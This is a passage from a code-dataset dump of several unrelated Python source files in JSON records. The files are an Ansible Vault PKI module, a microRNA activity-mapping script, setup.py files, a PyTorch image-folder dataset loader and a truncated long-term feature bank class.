'10.2.0.4':\n data_sent[3] += len(i)\n elif ip == '10.2.0.5':\n data_sent[4] += len(i)\n elif ip == '10.2.0.6':\n data_sent[5] += len(i) \n else:\n pass\n\t\n\nf.close()\n","repo_name":"hrishikeshathalye/EvalAQM","sub_path":"scripts/pcap_scrap.py","file_name":"pcap_scrap.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"26561727692","text":"#!/usr/bin/python\n\nfrom hvac.api.secrets_engines.pki import DEFAULT_MOUNT_POINT\nfrom ansible_collections.community.hashi_vault.plugins.module_utils._hashi_vault_module import HashiVaultModule\n\nfrom ..module_utils.utils import get_client\n\n\ndef main():\n argspec = HashiVaultModule.generate_argspec(\n mount_point=dict(type='str', default=DEFAULT_MOUNT_POINT),\n issuing_certificates=dict(type='list', elements='str', default=[]),\n crl_distribution_points=dict(type='list', elements='str', default=[]),\n ocsp_servers=dict(type='list', elements='str', default=[]),\n enable_templating=dict(type='bool', default=False),\n )\n\n module = HashiVaultModule(\n argument_spec=argspec,\n supports_check_mode=True\n )\n\n mount_point = module.params['mount_point']\n issuing_certificates = module.params['issuing_certificates']\n crl_distribution_points = module.params['crl_distribution_points']\n ocsp_servers = module.params['ocsp_servers']\n enable_templating = module.params['enable_templating']\n\n client = get_client(module)\n\n data = client.secrets.pki.read_urls(mount_point=mount_point)['data']\n params = {'issuing_certificates': issuing_certificates,\n 'crl_distribution_points': crl_distribution_points,\n 'ocsp_servers': ocsp_servers,\n 'enable_templating': enable_templating}\n\n if params == data:\n module.exit_json(changed=False)\n\n response = client.secrets.pki.set_urls(mount_point=mount_point,\n params=params)\n module.exit_json(changed=True, data=response['data'])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mmas/hashi_vault-ansible-collection","sub_path":"plugins/modules/vault_pki_urls.py","file_name":"vault_pki_urls.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28992392932","text":"import multiprocessing as mp\nimport os\nfrom pathlib import Path\nfrom time import time\nfrom typing import Optional, Tuple\nimport warnings\n\nfrom absl import app\nfrom absl import flags\nfrom absl import logging\nimport pandas as pd\n\nimport constants\nimport utils\n\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nwarnings.simplefilter(action='ignore', category=UserWarning)\nwarnings.simplefilter(action='ignore', category=RuntimeWarning)\n\nFLAGS = flags.FLAGS\n\nflags.DEFINE_integer(\n 'cpus', None, \n 'Number of CPUs to use in parallel. default: all available cpus are used.')\nflags.DEFINE_string(\n 'data_path', None, \n ('Path to dataset. if %s: path to dataset. if %s: path to the folder containing %s '\n 'folders.', (constants._DATA_TYPE_SINGLE_CELL, constants._DATA_TYPE_SPATIAL,\n ' and '.join(constants._SPATIAL_FOLDERS))))\nflags.DEFINE_string(\n 'dataset_name', None, \n 'Name of your dataset. This is used to generate results path')\nflags.DEFINE_boolean(\n 'debug', False, 'Produces debugging output.')\nflags.DEFINE_integer(\n 'filter_spots', None, \n 'Filter spots containins total amount of reads below the specified number. '\n 'default: do not filter any spot.')\nflags.DEFINE_string(\n 'miR_figures', constants._DRAW_TOP_10, \n 'Which microRNAs activity maps to draw. Options: %s .' % ' or '.join(constants._SUPPORTED_DRAW))\nflags.DEFINE_list(\n 'miR_list', None, \n ('Comma-separated list of microRNAs to compute. default: all microRNAs are computed.'\n 'Example use: -miR_list=hsa-miR-300,hsa-miR-6502-5p,hsa-miR-6727-3p'))\nflags.DEFINE_list(\n 'populations', None,\n ('Comma-separated list of two unique population string identifiers embedded in cell id.' \n 'default: None. Example use: -populations=\\'DESEASE_\\',\\'CONTROL_\\''))\nflags.DEFINE_boolean(\n 'preprocess', False, \n ('Performs additional preprocessing on %s data before computations, merges all '\n 'tables found in \\data_path\\' and samples 10K columns.', constants._DATA_TYPE_SINGLE_CELL))\nflags.DEFINE_string(\n 'results_path', None, \n 'Path to save results.')\nflags.DEFINE_integer(\n 'sample_size', constants._MAX_COLS, \n 'Amount of cells to sample in total. default: %s.' %constants._MAX_COLS)\nflags.DEFINE_string(\n 'species', constants._SPECIES_HOMO_SAPIENS, \n 'Options: %s .' % ' or '.join(constants._SUPPORTED_SPECIES))\nflags.DEFINE_float(\n 'thresh', constants._ACTIVITY_THRESH, \n ('Threshold of the microRNA activity p-value. If a microRNA receives a lower score than '\n ' \\'thresh\\' it is considered active. used in order to find the most active microRNAs '\n 'across the provided data.'))\n\nflags.register_validator('species', \n lambda value: value in constants._SUPPORTED_SPECIES,\n message=('Either %s are supported.', \n ' or '.join(constants._SUPPORTED_SPECIES)))\nflags.register_validator('miR_figures', \n lambda value: value in constants._SUPPORTED_DRAW,\n message=('Either %s are supported.',\n ' or '.join(constants._SUPPORTED_DRAW)))\n\nflags.mark_flag_as_required('dataset_name')\nflags.mark_flag_as_required('data_path')\n\ndef data_handling(data_path: str, dataset_name: str, data_type: Optional[str], \n preprocess: Optional[bool]=True, filter_spots: Optional[int]=None, \n sample_size: Optional[int]=constants._MAX_COLS) -> pd.DataFrame:\n '''Loading, preprocessing (if needed) and normalizing data.\n\n Args:\n data_path: path to data.\n dataset_name: dataset name.\n data_type: (optional) data type 'spatial' or 'scRNAseq'.\n preprocess: (optional) if True, performing data preprocessing if data is too big or is\n composed of multiple files. If False, will not perform data preprocessing. \n filter_spots: (optional) filter spots containing total number of reads below this number.\n sample_size: (optional) amount of cells to sample.\n\n Returns:\n counts_norm: normalized reads table\n counts: raw reads table\n '''\n if not data_type:\n data_type = utils.check_data_type(data_path)\n\n if data_type == constants._DATA_TYPE_SPATIAL:\n counts = utils.visium_loader(data_path, filter_spots)\n else:\n if preprocess:\n counts = utils.scRNAseq_preprocess_loader(dataset_name, data_path, sample_size)\n else:\n counts = utils.scRNAseq_loader(data_path)\n \n counts_norm = utils.normalize_counts(counts)\n return counts_norm, counts\n\ndef computing_mir_activity(counts_norm: pd.DataFrame, results_path: str, miR_list: Optional[list], \n cpus: Optional[int], species: Optional[str]=constants._SPECIES_HOMO_SAPIENS, \n debug: Optional[bool]=False) -> Tuple[list, pd.DataFrame]:\n '''Computing microRNA activity across the data.\n\n Args:\n counts_norm: normalized reads table.\n results_path: path to save results.\n miR_list: (optional) list of microRNAs to compute.\n cpus: (optional) amount of cpus to use in parallel.\n species: (optional) either 'homo_sapiens' (default) or 'mus_musculus' are supported. \n debug: (optional) if True, provides aditional information. Default=False.\n \n Returns:\n miR_activity_pvals: microRNA activity score per cell/spot.\n '''\n cpus = cpus or mp.cpu_count()\n logging.info('Using %i cpus', cpus)\n\n mti_data, miR_list = utils.mir_data_loading(\n miR_list=miR_list, \n species=species, \n debug=debug)\n \n start = time() \n miR_activity_pvals = utils.compute_mir_activity(\n counts_norm, \n miR_list, \n mti_data, \n results_path, \n cpus, \n debug=debug)\n logging.info('Computation time: %f minutes', (time() - start)//60)\n\n return miR_list, miR_activity_pvals\n\n\ndef mir_post_processing_spatial(data_path: str, counts_norm: pd.DataFrame, miR_activity_pvals: pd.DataFrame, \n miR_list: list, results_path: str, dataset_name: str, data_type: Optional[str],\n miR_figures: Optional[str]=constants._DRAW_TOP_10, \n thresh: Optional[float]=constants._ACTIVITY_THRESH) -> None:\n '''Perfoms post processing on spatial data.\n\n First sorting microRNAs by their overall level of activity, \n and then plotting according to user's requirement.\n If there are <= 10 microRNAs, or the user wants plots for all microRNAs, \n the function produces activity maps for all microRNAs without sorting first.\n\n Args:\n data_path: path to data.\n counts_norm: normalized reads table.\n miR_activity_pvals: microRNA activity results per spot.\n miR_list: list of microRNAs.\n results_path: path to save results.\n dataset_name: dataset name. \n data_type: (optional) data type 'spatial' or 'scRNAseq'.\n miR_figures: which microRNAs to plot. \n thresh: thresold to define what is considered active.\n\n Returns:\n None.\n\n Raises:\n UsageError if spatial data was not found in data_path.\n '''\n if not data_type:\n data_type = utils.check_data_type(data_path)\n if data_type is not constants._DATA_TYPE_SPATIAL:\n raise utils.UsageError('No spatial data was found for post-processing in %s', data_path)\n logging.info('Generating activity map figures')\n spatial_coors = utils.get_spatial_coors(data_path, counts_norm)\n spots = spatial_coors.shape[0]\n\n mir_activity_list = utils.sort_activity_spatial(\n miR_activity_pvals, \n thresh, \n spots, \n results_path, \n dataset_name)\n\n miR_list_figures = utils.get_figure_list(\n miR_list,\n miR_figures,\n mir_activity_list)\n\n utils.produce_spatial_maps(\n miR_list_figures, \n miR_activity_pvals, \n spatial_coors, \n results_path, \n dataset_name, \n mir_activity_list)\n\ndef mir_post_processing_sc(data_path: str, counts: pd.DataFrame, miR_activity_pvals: pd.DataFrame, \n miR_list: list, results_path: str, dataset_name: str, data_type: Optional[str],\n miR_figures: Optional[str]=constants._DRAW_TOP_10, populations: Optional[list]=None) -> None:\n '''Perfoms post processing on scRNAseq data.\n\n Computes UMAP based on gene expression, sorts microRNAs by their overall level of activity, \n and plots UMAP according to user's requirement.\n If there are <= 10 microRNAs, or the user wants plots for all microRNAs, \n the function produces activity maps for all microRNAs without sorting first.\n\n Args:\n data_path: path to data.\n counts: raw reads table.\n miR_activity_pvals: microRNA activity results per spot.\n miR_list: list of microRNAs.\n results_path: path to save results.\n dataset_name: dataset name. \n data_type: (optional) data type 'spatial' or 'scRNAseq'.\n miR_figures: (optional) which microRNAs to plot. \n populations: (optional) list of two population string identifiers embedded in cell id.\n\n Returns:\n None.\n\n Raises:\n UsageError if spatial data was not found in data_path.\n '''\n if not data_type:\n data_type = utils.check_data_type(data_path)\n if data_type is not constants._DATA_TYPE_SINGLE_CELL:\n raise utils.UsageError('No scRNAseq data was found for post-processing in %s', data_path)\n logging.info('Single cell post processing')\n enriched_counts = utils.generate_umap(\n counts, \n miR_activity_pvals,\n populations)\n\n mir_activity_list = utils.sort_activity_sc(\n miR_activity_pvals, \n populations)\n\n miR_list_figures = utils.get_figure_list(\n miR_list,\n miR_figures,\n mir_activity_list)\n\n utils.plot_sc(\n miR_list_figures, \n enriched_counts,\n results_path, \n dataset_name, \n mir_activity_list,\n miR_activity_pvals,\n populations)\n\n\ndef compute(data_path: str, dataset_name: str, miR_list: Optional[list], cpus: Optional[int],\n results_path: Optional[str], sample_size: Optional[int]=constants._MAX_COLS, \n species: Optional[str]=constants._SPECIES_HOMO_SAPIENS, \n miR_figures: Optional[str]=constants._DRAW_TOP_10, \n preprocess: Optional[bool]=True, thresh: Optional[float]=constants._ACTIVITY_THRESH,\n populations: Optional[list]=None, debug: Optional[bool]=False, filter_spots: Optional[int]=None):\n '''Performing end-to-end microRNA activity map computation.\n\n Loading spatial/scRNAseq data and preprocessing if needed.\n Computing microRNA for all spots/cells.\n Saving results locally and producing maps for spatial data.\n\n Args:\n data_path: path to data.\n dataset_name: dataset name. \n miR_list: (optional) list of microRNAs to compute.\n cpus: (optional) amount of cpus to use in parallel.\n results_path: (optional) path to save results.\n sample_size: (optional) desired sample size for amount of cells.\n species: (optional) either 'homo_sapiens' (default) or 'mus_musculus' are supported. \n miR_figures: (optional) which microRNAs to plot. \n preprocess: (optional) if True, performing data preprocessing if data is too big or is\n composed of multiple files. If False, will not perform data preprocessing. \n thresh: (optional) thresold to define what is considered active.\n populations: (optional) list of two population string identifiers embedded in cell id.\n debug: (optional) if True, provides aditional information. Default=False.\n filter_spots: (optional) filter spots containing total reads below this number.\n\n Returns:\n None\n '''\n if debug:\n logging.set_verbosity(logging.DEBUG)\n logging.debug('Debug mode is on')\n else:\n logging.set_verbosity(logging.INFO)\n\n logging.info('Dataset name: %s', dataset_name)\n logging.info('Path to dataset: %s', data_path)\n\n if results_path:\n results_path = os.path.join(results_path, dataset_name)\n else:\n results_path = os.path.join(data_path, 'results')\n logging.info('Results path: %s', results_path)\n \n data_type = utils.check_data_type(data_path)\n \n counts_norm, counts = data_handling(\n data_path, \n dataset_name, \n data_type=data_type, \n preprocess=preprocess,\n filter_spots=filter_spots,\n sample_size=sample_size)\n\n miR_list, miR_activity_pvals = computing_mir_activity(\n counts_norm, \n results_path, \n miR_list=miR_list, \n cpus=cpus, \n species=species,\n debug=debug)\n\n if data_type == constants._DATA_TYPE_SPATIAL:\n mir_post_processing_spatial(\n data_path, \n counts_norm, \n miR_activity_pvals, \n miR_list=miR_list, \n results_path=results_path, \n dataset_name=dataset_name,\n data_type=data_type,\n miR_figures=miR_figures, \n thresh=thresh)\n else:\n mir_post_processing_sc(\n data_path, \n counts, \n miR_activity_pvals, \n miR_list=miR_list, \n results_path=results_path, \n dataset_name=dataset_name,\n data_type=data_type,\n miR_figures=miR_figures,\n populations=populations)\n logging.info('Done.')\n\ndef main(argv):\n compute(\n data_path=FLAGS.data_path, \n dataset_name=FLAGS.dataset_name, \n miR_list=FLAGS.miR_list, \n cpus=FLAGS.cpus, \n results_path=FLAGS.results_path, \n sample_size=FLAGS.sample_size,\n species=FLAGS.species, \n miR_figures=FLAGS.miR_figures,\n preprocess=FLAGS.preprocess, \n thresh=FLAGS.thresh,\n populations=FLAGS.populations,\n debug=FLAGS.debug,\n filter_spots=FLAGS.filter_spots)\n\nif __name__ == '__main__': \n app.run(main)","repo_name":"EfiHerbst31/microRNA-activity-maps","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15608367960","text":"def pdt_of_3(arr):\n\n if len(arr) < 3:\n raise Exception(\"please check ur input\")\n\n highest = max(arr[0], arr[1])\n lowest = min(arr[0], arr[1])\n\n highest2 = lowest2 = arr[0] * arr[1]\n\n highest3 = arr[0] * arr[1] * arr[2]\n\n for i in range(2, len(arr)):\n\n highest3 = max(highest3, arr[i] * highest2, arr[i] * lowest2)\n\n highest2 = max(highest2, arr[i] * highest , arr[i] * lowest)\n lowest2 = min(lowest2, arr[i] * lowest, arr[i] * highest)\n\n highest = max(highest, arr[i])\n lowest = min(lowest, arr[i])\n\n return highest3\n\n\nif __name__ == \"__main__\":\n arr = [1,10,-5,1,-100]\n print(pdt_of_3(arr))\n","repo_name":"pavankumar2203/InterviewcakeSolutions","sub_path":"3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25829334912","text":"import os\nfrom setuptools import setup, find_packages\n\n# Utility function to read the README file.\n# Used for the long_description. It's nice, because now 1) we have a top level\n# README file and 2) it's easier to type in the README file than to put a raw\n# string in below ...\n\n# SCRIPTS = []\n# SCRIPTS.extend([os.path.join(\"scripts\", script)\n# \t\t\t\tfor script in os.listdir(os.path.join(os.path.dirname(__file__), \"scripts\"))\n# \t\t\t\tif script.endswith(\".py\")])\n\nHERE = os.path.abspath(os.path.dirname(__file__))\nwith open(os.path.join(HERE, 'README.md'), 'r') as fid:\n\tLONG_DESCRIPTION = fid.read()\n\nsetup(\n\tname=\"fununifrac\",\n\tversion=\"0.0.1\",\n\tauthor=\"David Koslicki\",\n\tauthor_email=\"dmkoslicki@gmail.com\",\n\tdescription=(\"A repository to implement UniFrac, but on functional profiles of metagenomic data.\"),\n\tlong_description=LONG_DESCRIPTION,\n\t#license=\"BSD-3-Clause\", # see classifiers\n\tkeywords=\"unifrac kegg emd genomics metagenomics\",\n\turl=\"https://github.com/KoslickiLab/FunUniFrac\",\n\tpackages=find_packages(),\n\tinstall_requires=[\n\t 'blist',\n 'scipy==1.8.0',\n 'networkx==2.8.4',\n 'numpy==1.23.2',\n 'pandas==1.4.3',\n 'pyemd==0.5.1',\n 'sparse',\n 'requests',\n 'seaborn'\n ],\n\tzip_safe=False,\n\t# package_data={'CMash': ['data/*.fna', 'tests/Organisms/*.fna.gz']},\n\t# scripts=SCRIPTS,\n\tentry_points={\n 'console_scripts': [ \n 'compute_fununifrac.py = fununifrac.compute_fununifrac:main',\n\t \t'compute_edges.py = fununifrac.compute_edges:main',\n\t\t 'create_edge_matrix.py = fununifrac.create_edge_matrix:main'\n ]\n },\n\tclassifiers=[\n\t\t\"Development Status :: 3 - Alpha\",\n\t\t\"Topic :: Scientific/Engineering :: Bio-Informatics\",\n\t\t\"Topic :: Scientific/Engineering :: Mathematics\",\n\t\t\"License :: OSI Approved :: BSD License\",\n\t\t\"Intended Audience :: Science/Research\",\n\t\t\"Programming Language :: Python :: 3.6\",\n\t\t\"Programming Language :: Python :: 3.7\",\n\t\t\"Programming Language :: Python :: 3.8\",\n\t\t\"Programming Language :: Python :: 3.9\",\n\t\t\"Natural Language :: English\",\n\t\t\"Operating System :: MacOS :: MacOS X\",\n\t\t\"Operating System :: POSIX :: Linux\",\n\t]\n)","repo_name":"KoslickiLab/FunUniFrac","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"71464110481","text":"import torch\nimport torch.utils.data as data\n\nfrom PIL import Image\n\nimport os\nimport os.path\nimport sys\n\n\ndef has_file_allowed_extension(filename, extensions):\n \"\"\"Checks if a file is an allowed extension.\n\n Args:\n filename (string): path to a file\n extensions (iterable of strings): extensions to consider (lowercase)\n\n Returns:\n bool: True if the filename ends with one of given extensions\n \"\"\"\n filename_lower = filename.lower()\n return any(filename_lower.endswith(ext) for ext in extensions)\n\n\ndef is_image_file(filename):\n \"\"\"Checks if a file is an allowed image extension.\n\n Args:\n filename (string): path to a file\n\n Returns:\n bool: True if the filename ends with a known image extension\n \"\"\"\n return has_file_allowed_extension(filename, IMG_EXTENSIONS)\n\n\ndef make_dataset(dir, class_to_idx, extensions):\n \"\"\"\n Parameters\n ----------\n dir : str\n path to the root of the dataset\n class_to_idx : dict[str, int]\n dir name and the value is index. e.g. {'id_0': 0, 'id_1': 1, ..., }\n extensions : list[str]\n list of allowed extensions\n\n Returns\n -------\n list[(str, int)]\n list of (image path, class index) tuples\n \"\"\"\n images = []\n dir = os.path.expanduser(dir)\n for target in sorted(class_to_idx.keys()):\n d = os.path.join(dir, target)\n if not os.path.isdir(d):\n continue\n\n for root, _, fnames in sorted(os.walk(d)):\n for fname in sorted(fnames):\n if has_file_allowed_extension(fname, extensions):\n path = os.path.join(root, fname)\n item = (path, class_to_idx[target])\n images.append(item)\n\n return images\n\n\nclass DatasetFolder(data.Dataset):\n \"\"\"A generic data loader where the samples are arranged in this way: ::\n\n root/class_x/xxx.ext\n root/class_x/xxy.ext\n root/class_x/xxz.ext\n\n root/class_y/123.ext\n root/class_y/nsdf3.ext\n root/class_y/asd932_.ext\n\n Args:\n root (string): Root directory path.\n loader (callable): A function to load a sample given its path.\n extensions (list[string]): A list of allowed extensions.\n transform (callable, optional): A function/transform that takes in\n a sample and returns a transformed version.\n E.g, ``transforms.RandomCrop`` for images.\n target_transform (callable, optional): A function/transform that takes\n in the target and transforms it.\n\n Attributes:\n classes (list): List of the class names.\n class_to_idx (dict): Dict with items (class_name, class_index).\n samples (list): List of (sample path, class_index) tuples\n targets (list): The class_index value for each image in the dataset\n \"\"\"\n\n def __init__(\n self,\n root,\n loader,\n extensions,\n transform=None,\n target_transform=None):\n\n # class_to_idx: the key is dir name and the value is index.\n # {'id_0': 0, 'id_1': 1, ..., }\n classes, class_to_idx = self._find_classes(root)\n\n # The type of samples: [(img_path, class_idx), (img_path,\n # class_idx),...]\n samples = make_dataset(root, class_to_idx, extensions)\n if len(samples) == 0:\n raise(\n RuntimeError(\n \"Found 0 files in subfolders of: \" +\n root +\n \"\\n\"\n \"Supported extensions are: \" +\n \",\".join(extensions)))\n\n self.root = root\n self.loader = loader\n self.extensions = extensions\n\n self.classes = classes\n self.class_to_idx = class_to_idx\n self.samples = samples\n self.targets = [s[1] for s in samples]\n\n self.transform = transform\n self.target_transform = target_transform\n\n def _find_classes(self, dir):\n \"\"\"\n Finds the class folders in a dataset.\n\n Args:\n dir (string): Root directory path.\n\n Returns:\n tuple: (classes, class_to_idx) where classes are relative to (dir), and class_to_idx is a dictionary.\n\n Ensures:\n No class is a subdirectory of another.\n \"\"\"\n if sys.version_info >= (3, 5):\n # Faster and available in Python 3.5 and above\n classes = [d.name for d in os.scandir(dir) if d.is_dir()]\n else:\n classes = [\n d for d in os.listdir(dir) if os.path.isdir(\n os.path.join(\n dir, d))]\n classes.sort()\n classes.sort(key=lambda x: int(x[3:]))\n\n # the key is dir name and the value is index.\n # {'id_0': 0, 'id_1': 1, ..., }\n class_to_idx = {classes[i]: i for i in range(len(classes))}\n return classes, class_to_idx\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n\n Returns:\n tuple: (sample, target) where target is class_index of the target class.\n \"\"\"\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform is not None:\n sample = self.transform(sample)\n if self.target_transform is not None:\n target = self.target_transform(target)\n imgname = path.split('/')[-1].replace('.JPEG', '')\n return sample, target, imgname\n\n def __len__(self):\n return len(self.samples)\n\n def __repr__(self):\n fmt_str = 'Dataset ' + self.__class__.__name__ + '\\n'\n fmt_str += ' Number of datapoints: {}\\n'.format(self.__len__())\n fmt_str += ' Root Location: {}\\n'.format(self.root)\n tmp = ' Transforms (if any): '\n fmt_str += '{0}{1}\\n'.format(tmp,\n self.transform.__repr__().replace('\\n',\n '\\n' + ' ' * len(tmp)))\n tmp = ' Target Transforms (if any): '\n fmt_str += '{0}{1}'.format(tmp,\n self.target_transform.__repr__().replace('\\n',\n '\\n' + ' ' * len(tmp)))\n return fmt_str\n\n\nIMG_EXTENSIONS = [\n '.jpg',\n '.jpeg',\n '.png',\n '.ppm',\n '.bmp',\n '.pgm',\n '.tif',\n '.tiff',\n 'webp']\n\n\ndef pil_loader(path, input_ch=3):\n # open path as file to avoid ResourceWarning\n # (https://github.com/python-pillow/Pillow/issues/835)\n with open(path, 'rb') as f:\n img = Image.open(f)\n if input_ch == 1:\n return img.convert('L')\n return img.convert('RGB')\n\n\ndef default_loader(path, input_ch=3):\n return pil_loader(path, input_ch)\n\n\nclass ImageFolderRemap(DatasetFolder):\n def __init__(\n self,\n root,\n transform=None,\n target_transform=None,\n loader=default_loader,\n remap_table=None,\n with_idx=False,\n input_ch=3):\n super(\n ImageFolderRemap,\n self).__init__(\n root,\n loader,\n IMG_EXTENSIONS,\n transform=transform,\n target_transform=target_transform)\n\n self.imgs = self.samples\n self.class_table = remap_table\n self.with_idx = with_idx\n self.input_ch = input_ch\n\n def __getitem__(self, index):\n # The type of self.samples: [(img_path, class_idx), (img_path,\n # class_idx),...]\n path, target = self.samples[index]\n cnt_idx = int(os.path.splitext(os.path.basename(path))[0])\n sample = self.loader(path, self.input_ch)\n if self.transform is not None:\n sample = self.transform(sample)\n if self.target_transform is not None:\n target = self.target_transform(target)\n target = self.class_table[target]\n if self.with_idx:\n return sample, index, target\n\n # The type of sample is PIL.Image\n # The type of target is int\n # target is the target font id\n return sample, target, cnt_idx\n\n\nclass ImageFolderRemapPair(DatasetFolder):\n def __init__(\n self,\n root,\n transform=None,\n target_transform=None,\n loader=default_loader,\n input_ch=1,\n pair_size=2,\n ):\n super(\n ImageFolderRemapPair,\n self).__init__(\n root,\n loader,\n IMG_EXTENSIONS,\n transform=transform,\n target_transform=target_transform)\n\n self.imgs = self.samples\n self.input_ch = input_ch\n self.pair_size = pair_size\n\n def __getitem__(self, index):\n # The type of self.samples: [(img_path, class_idx), (img_path,\n # class_idx),...]\n samples = []\n targets = []\n cnt_idxs = []\n for i in range(self.pair_size):\n # The type of sample is PIL.Image\n # The type of target is int\n # target is the target font id\n\n path, target = self.samples[index * self.pair_size + i]\n cnt_idx = int(os.path.splitext(os.path.basename(path))[0])\n sample = self.loader(path, self.input_ch)\n if self.transform is not None:\n sample = self.transform(sample)\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n samples.append(sample)\n targets.append(target)\n cnt_idxs.append(cnt_idx)\n samples = torch.cat(samples, dim=0)\n targets = torch.tensor(targets)\n cnt_idxs = torch.tensor(cnt_idxs)\n return samples, targets, cnt_idxs\n\n def __len__(self):\n return int(len(self.samples) / self.pair_size)\n","repo_name":"yukistavailable/FontDiscriminator","sub_path":"dataset/custom_dataset.py","file_name":"custom_dataset.py","file_ext":"py","file_size_in_byte":9881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40976854121","text":"#!/usr/bin/env python\nfrom setuptools import setup\n\ntry:\n import pypandoc\n long_description = pypandoc.convert('README.md', 'rst')\nexcept(IOError, ImportError):\n long_description = \"\"\n\npackages = [\n \"sneakysnek\",\n \"sneakysnek.recorders\"\n]\n\nrequires = []\nextras_require = {\n \":sys_platform == 'darwin'\": [\"pyobjc-framework-Quartz\"],\n \":'linux' in sys_platform\": [\"python-xlib\"]\n}\n\nsetup(\n name='sneakysnek',\n version=\"0.1.1\",\n description=\"Dead simple cross-platform keyboard & mouse global input capture solution for Python 3.6+\",\n long_description=long_description,\n author=\"Nicholas Brochu\",\n author_email='nicholas@serpent.ai',\n packages=packages,\n include_package_data=True,\n install_requires=requires,\n extras_require=extras_require,\n entry_points={\n 'console_scripts': ['sneakysnek = sneakysnek.recorder:demo']\n },\n license='MIT',\n url='https://github.com/SerpentAI/sneakysnek',\n zip_safe=False,\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'Natural Language :: English',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.6'\n ]\n)\n","repo_name":"SerpentAI/sneakysnek","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"3"} +{"seq_id":"30514782222","text":"import io\nimport os\nimport os.path as osp\nimport warnings\n\nimport torch\nimport torch.distributed as dist\nfrom mmengine.dist import get_dist_info\n\ntry:\n import lmdb\n lmdb_imported = True\nexcept (ImportError, ModuleNotFoundError):\n lmdb_imported = False\n\n\nclass LFB:\n \"\"\"Long-Term Feature Bank (LFB). LFB is proposed in `Long-Term Feature\n Banks for Detailed Video Understanding `_\n The ROI features of videos are stored in the feature bank. The feature bank\n was generated by inferring with a lfb infer config. Formally, LFB is a Dict\n whose keys are video IDs and its values are also Dicts whose keys are\n timestamps in seconds. Example of LFB:\n\n .. code-block:: Python\n {\n '0f39OWEqJ24': {\n 901: tensor([[ 1.2760, 1.1965, ..., 0.0061, -0.0639],\n [-0.6320, 0.3794, ..., -1.2768, 0.5684],\n [ 0.2535, 1.0049, ..., 0.4906, 1.2555],\n [-0.5838, 0.8549, ..., -2.1736, 0.4162]]),\n ...\n 1705: tensor([[-1.0169, -1.1293, ..., 0.6793, -2.0540],\n [ 1.2436, -0.4555, ..., 0.2281, -0.8219],\n [ 0.2815, -0.0547, ..., -0.4199, 0.5157]]),\n ...\n },\n 'xmqSaQPzL1E': {\n ...\n },\n ...\n }\n Args:\n lfb_prefix_path (str): The storage path of lfb.\n max_num_sampled_feat (int): The max number of sampled features.\n Default: 5.\n window_size (int): Window size of sampling long term feature.\n Default: 60.\n lfb_channels (int): Number of the channels of the features stored\n in LFB. Default: 2048.\n dataset_modes (tuple[str] | str): Load LFB of datasets with different\n modes, such as training, validation, testing datasets. If you don't\n do cross validation during training, just load the training dataset\n i.e. setting `dataset_modes = ('train')`.\n Default: ('train', 'val').\n device (str): Where to load lfb. Choices are 'gpu', 'cpu' and 'lmdb'.\n A 1.65GB half-precision ava lfb (including training and validation)\n occupies about 2GB GPU memory. Default: 'gpu'.\n lmdb_map_size (int): Map size of lmdb. Default: 4e9.\n construct_lmdb (bool): Whether to construct lmdb. If you have\n constructed lmdb of lfb, you can set to False to skip the\n construction. Default: True.\n \"\"\"\n\n def __init__(self,\n lfb_prefix_path,\n max_num_sampled_feat=5,\n window_size=60,\n lfb_channels=2048,\n dataset_modes=('train', 'val'),\n device='gpu',\n lmdb_map_size=4e9,\n construct_lmdb=True):\n if not osp.exists(lfb_prefix_path):\n raise ValueError(\n f'lfb prefix path {lfb_prefix_path} does not exist!')\n self.lfb_prefix_path = lfb_prefix_path\n self.max_num_sampled_feat = max_num_sampled_feat\n self.window_size = window_size\n self.lfb_channels = lfb_channels\n if not isinstance(dataset_modes, tuple):\n assert isinstance(dataset_modes, str)\n dataset_modes = (dataset_modes, )\n self.dataset_modes = dataset_modes\n self.device = device\n\n rank, world_size = get_dist_info()\n # Loading LFB\n if self.device == 'gpu':\n if 'LOCAL_RANK' in os.environ:\n local_rank = int(os.environ['LOCAL_RANK'])\n else:\n gpus_per_node = torch.cuda.device_count()\n local_rank = rank % gpus_per_node\n\n self.load_lfb(f'cuda:{local_rank}')\n elif self.device == 'cpu':\n if world_size > 1:\n warnings.warn(\n 'If distributed training is used with multi-GPUs, lfb '\n 'will be loaded multiple times on RAM. In this case, '\n \"'lmdb' is recommended.\", UserWarning)\n self.load_lfb('cpu')\n elif self.device == 'lmdb':\n assert lmdb_imported, (\n 'Please install `lmdb` to load lfb on lmdb!')\n self.lmdb_map_size = lmdb_map_size\n self.construct_lmdb = construct_lmdb\n self.lfb_lmdb_path = osp.normpath(\n osp.join(self.lfb_prefix_path, 'lmdb'))\n\n if rank == 0 and self.construct_lmdb:\n print('Constructing LFB lmdb...')\n self.load_lfb_on_lmdb()\n\n # Synchronizes all processes to make sure lfb lmdb exist.\n if world_size > 1:\n dist.barrier()\n self.lmdb_env = lmdb.open(self.lfb_lmdb_path, readonly=True)\n else:\n raise ValueError(\"Device must be 'gpu', 'cpu' or 'lmdb', \",\n f'but get {self.device}.')\n\n def load_lfb(self, map_location):\n self.lfb = {}\n for dataset_mode in self.dataset_modes:\n lfb_path = 